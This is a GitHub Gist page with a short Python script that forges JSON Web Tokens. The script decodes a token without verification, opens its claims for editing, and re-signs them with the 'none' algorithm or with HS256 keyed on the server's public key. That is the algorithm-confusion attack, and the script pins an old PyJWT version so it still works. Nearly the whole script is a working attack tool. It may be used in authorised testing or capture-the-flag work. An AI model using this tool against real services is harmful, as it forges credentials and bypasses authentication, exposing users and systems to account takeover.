Last active
December 29, 2021 21:53
-
-
Save sig00x/54ad6a3876fb5e2bda65bc0069db6401 to your computer and use it in GitHub Desktop.
jwt repack with alg None or HS256 with public key
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # -*- coding: utf-8 -*- | |
| # we need version pyJWT 0.4.3 in order for public key encode to work! | |
| import pkg_resources | |
| pkg_resources.require("PyJWT==0.4.3") | |
| import jwt # => pip install pyjwt==0.4.3 | |
| import sys | |
| import tempfile | |
| import json | |
| import subprocess | |
| import argparse | |
| # option parser | |
| parser = argparse.ArgumentParser(description='Manipulate JWT tokens') | |
| parser.add_argument('-t', '--token', type=str, help='JWT Token you got from the website') | |
| parser.add_argument('-k', '--key', type=str, help='Public key input file') | |
| args = parser.parse_args() | |
| def edit(ln: str): | |
| with tempfile.NamedTemporaryFile(suffix=".txt", mode = "w", delete=True) as tmp: | |
| tmp.write(ln) | |
| tmp.flush() | |
| subprocess.call(['nano', tmp.name]) | |
| with open(tmp.name, 'r') as f: | |
| return f.read() | |
| # manipulate the payload | |
| payload = json.loads(edit(json.dumps(jwt.decode(args.token, verify=False)))) | |
| # print with alg None | |
| print(f"\n\x1b[1;31mNone:\x1b[0m {jwt.encode(payload, key='', algorithm=None).decode()}") | |
| # if public key is provided do one with HS256 | |
| if (args.key): | |
| with open(args.key, 'r') as public: | |
| print(f"\x1b[1;31mHS256:\x1b[0m {jwt.encode(payload, key=public.read(), algorithm='HS256').decode()}") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment